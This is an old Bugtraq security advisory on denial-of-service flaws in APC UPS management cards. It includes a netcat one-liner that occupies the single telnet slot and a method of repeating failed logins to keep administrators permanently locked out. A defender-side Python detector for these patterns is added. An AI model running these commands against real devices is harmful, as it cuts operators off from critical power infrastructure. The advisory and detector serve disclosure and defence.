Date: Mon, 26 Feb 2001 03:30:08 -0000
From: altomo@NUDEHACKERS.COM
Subject: APC web/snmp/telnet management card dos
To: BUGTRAQ@SECURITYFOCUS.COM

altomo@nudehackers.com
APC web/snmp management card

Some APC products such as the Symmetra offer the option of adding a management card to allow an admin the ability to set up monitoring and notification. The card is accessible by snmp, web interface, and telnet. It seems that only one telnet connection is allowed at a time (problem 1). The telnet session is authenticated by a user/password method; if the incorrect combination is entered 3 times, no connections are allowed for the defined lockout time. Min. 1 minute, max 10 minutes (problem 2).

Problem 1 - Since only one connection is allowed to the telnet port, an admin could be kept from connecting. Easy to reproduce.

Problem 2 - Lock out period. Lock out periods are a good thing, I really do like them. But when no one can connect it's a bad thing. Since the lockout period cannot be set to 0, an attacker could take advantage of this by sending 3 incorrect login attempts to the unit and repeat every 60 secs using the minimal lockout time. Even if the admin has lockout set to 10 minutes it will keep repeating and work when it actually is enabled again.

Both of these are easy to reproduce.
problem 1 - cat /dev/zero | nc ip-here 23 (ya ya dirty)
problem 2 - attempt login 3 times, or run script attached.

- Contacting APC -
Contacted APC via email and informed them of what had been found and asked if this was going to be addressed in the future. The response received back was: "At this time the security on the web card is at its highest level. The only other suggestion is to make changes on the firewall."

Well, not really what I wanted to hear but hey why not. I responded in order to try one more time and received the same response back.
altomo@nudehackers.com

Attachment: apcdos.pl (application/x-perl)
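
Added example, not part of the original post or any APC code: a defender-side check over firewall connection records that flags the two patterns the advisory describes, a telnet session that holds the card's single slot and short connections recurring at a steady interval inside the 1 to 10 minute lockout range. The log format, the addresses and the thresholds (max_session, min_repeats, jitter) are constructed assumptions.

```python
import re
from collections import defaultdict
from statistics import pstdev

# Constructed sample records in a hypothetical firewall-log format:
# epoch seconds, source address, destination port, connection duration in seconds.
SAMPLE_LOG = """\
1000 src=192.0.2.10 dport=23 dur=4
1061 src=192.0.2.10 dport=23 dur=4
1122 src=192.0.2.10 dport=23 dur=5
1183 src=192.0.2.10 dport=23 dur=4
1244 src=192.0.2.10 dport=23 dur=4
1300 src=198.51.100.7 dport=23 dur=5400
1500 src=203.0.113.3 dport=23 dur=240
9000 src=203.0.113.3 dport=23 dur=180
1600 src=192.0.2.10 dport=80 dur=2
"""

LINE = re.compile(r"^(\d+) src=(\S+) dport=(\d+) dur=(\d+)$")
LOCKOUT_MIN, LOCKOUT_MAX = 60, 600  # lockout range stated in the advisory (1 to 10 minutes)

def parse(log):
    """Yield (timestamp, source, port, duration) for each well-formed line."""
    for line in log.splitlines():
        m = LINE.match(line.strip())
        if m:
            ts, src, dport, dur = m.groups()
            yield int(ts), src, int(dport), int(dur)

def detect(log, max_session=3600, min_repeats=4, jitter=10):
    """Return {source: reason} for telnet (port 23) activity matching either problem."""
    findings, starts = {}, defaultdict(list)
    for ts, src, dport, dur in parse(log):
        if dport != 23:
            continue
        starts[src].append(ts)
        if dur > max_session:  # problem 1: the only telnet slot is held
            findings[src] = "slot-held"
    for src, times in starts.items():
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        # problem 2: reconnects repeating at a steady interval near the lockout period
        if (len(gaps) >= min_repeats
                and all(LOCKOUT_MIN <= g <= LOCKOUT_MAX + jitter for g in gaps)
                and pstdev(gaps) <= jitter):
            findings.setdefault(src, "periodic-lockout")
    return findings

if __name__ == "__main__":
    for src, reason in detect(SAMPLE_LOG).items():
        print(src, reason)
```

An administrator's occasional sessions (203.0.113.3 in the sample) are not flagged, because they neither exceed the session limit nor recur at a steady lockout-length interval.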